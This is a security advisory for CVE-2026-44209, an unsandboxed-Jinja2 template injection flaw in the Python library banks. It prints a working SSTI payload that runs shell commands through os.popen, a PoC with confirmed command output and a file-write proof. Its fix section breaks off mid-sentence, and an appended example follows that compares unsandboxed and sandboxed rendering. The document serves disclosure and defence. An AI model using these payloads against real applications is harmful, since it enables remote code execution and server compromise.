CVE-2026-44209 - banks has Critical Remote Code Execution (RCE) via Jinja2 SSTI

📡 GitHub-Advisory · 2026-05-08


CVE-2026-44209

GHSA-gphh-9q3h-jgpp HIGH pip/banks

CVE: CVE-2026-44209

Summary

banks <= 2.4.1 uses jinja2.Environment() (unsandboxed) to render prompt templates. Applications that pass user-supplied strings as the template argument to Prompt() are vulnerable to Server-Side Template Injection (SSTI), which can lead to Remote Code Execution (RCE) on the host system.

This is a vulnerability in how banks initializes its Jinja2 environment — not in Jinja2 itself.

Vulnerable Code

src/banks/env.py — the global Jinja2 environment is created without sandboxing:

```python
from jinja2 import Environment, select_autoescape

env = Environment(
    autoescape=select_autoescape(enabled_extensions=("html", "xml"), default_for_string=False),
    # ... remaining keyword arguments omitted in the advisory
)
```

Attack Scenario

An application that stores prompt templates in a database, accepts them via an API, or loads them from a user-supplied config file and passes them to Prompt() is vulnerable. For example:

```python
from banks import Prompt

# User-controlled input reaches Prompt()
user_input = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(user_input)
p.text()  # Executes arbitrary command on the host
```

Proof of Concept

Setup:

```shell
pip install banks==2.4.1
```

PoC script:

```python
from banks import Prompt

payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(payload)
result = p.text()
print(f"[+] Output: {result}")
```

Confirmed output:

```text
[+] Output: uid=1000(ak) gid=1000(ak) groups=1000(ak),27(sudo),...
```

**File-write proof:**

```python
from banks import Prompt

p = Prompt("{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo POC > /tmp/rce_banks_exec').read() }}")
p.text()
```

```shell
$ ls -l /tmp/rce_banks_exec
-rw-rw-r-- 1 ak ak 4 Apr 27 15:36 /tmp/rce_banks_exec
```

## Impact

Applications that allow end-users to supply or customize prompt templates are at risk of full Remote Code Execution, including arbitrary command execution, data exfiltration, and server compromise.

## Fix

Fixed in `banks 2.4
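As an added example (not code from banks or from the advisory), the following renders the same kind of template with the unsandboxed `Environment` the advisory describes and with Jinja2's `SandboxedEnvironment`, the standard mitigation for untrusted templates; the page does not say whether the banks fix uses exactly this. The probe template keeps only the dunder walk from the payload above and reads a module name instead of running a command, so the demo shows the sandbox raising `SecurityError` without spawning a shell. It assumes Jinja2 is installed.

```python
# Added example, not code from banks: the unsandboxed Environment the advisory
# describes next to Jinja2's SandboxedEnvironment, applied to the same templates.
# Assumes Jinja2 is installed.
from jinja2 import Environment, select_autoescape
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# The dunder walk from the advisory's payload, stopped before the os import:
# `self` is Jinja2's TemplateReference, so __init__.__globals__ is the
# jinja2.runtime module namespace, and its __name__ key proves the reach.
PROBE_TEMPLATE = "{{ self.__init__.__globals__.__name__ }}"
# A legitimate prompt template of the kind banks is meant to render.
BENIGN_TEMPLATE = "Summarize the following for {{ audience }}: {{ text }}"


def make_env(sandboxed: bool):
    """Same autoescape settings as banks' env.py; only the class changes."""
    env_cls = SandboxedEnvironment if sandboxed else Environment
    return env_cls(
        autoescape=select_autoescape(
            enabled_extensions=("html", "xml"), default_for_string=False
        )
    )


def render(template_str: str, sandboxed: bool, **context):
    """Render one string template; returns ('ok', text) or ('blocked', why)."""
    env = make_env(sandboxed)
    try:
        return "ok", env.from_string(template_str).render(**context)
    except SecurityError as exc:
        # SandboxedEnvironment refuses underscore-prefixed attribute access
        # and raises here instead of handing out __globals__.
        return "blocked", str(exc)


if __name__ == "__main__":
    for sandboxed in (False, True):
        label = "sandboxed" if sandboxed else "unsandboxed"
        print(label, "probe  ->", render(PROBE_TEMPLATE, sandboxed))
        print(label, "benign ->", render(BENIGN_TEMPLATE, sandboxed,
                                         audience="executives", text="Q3 notes"))
```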
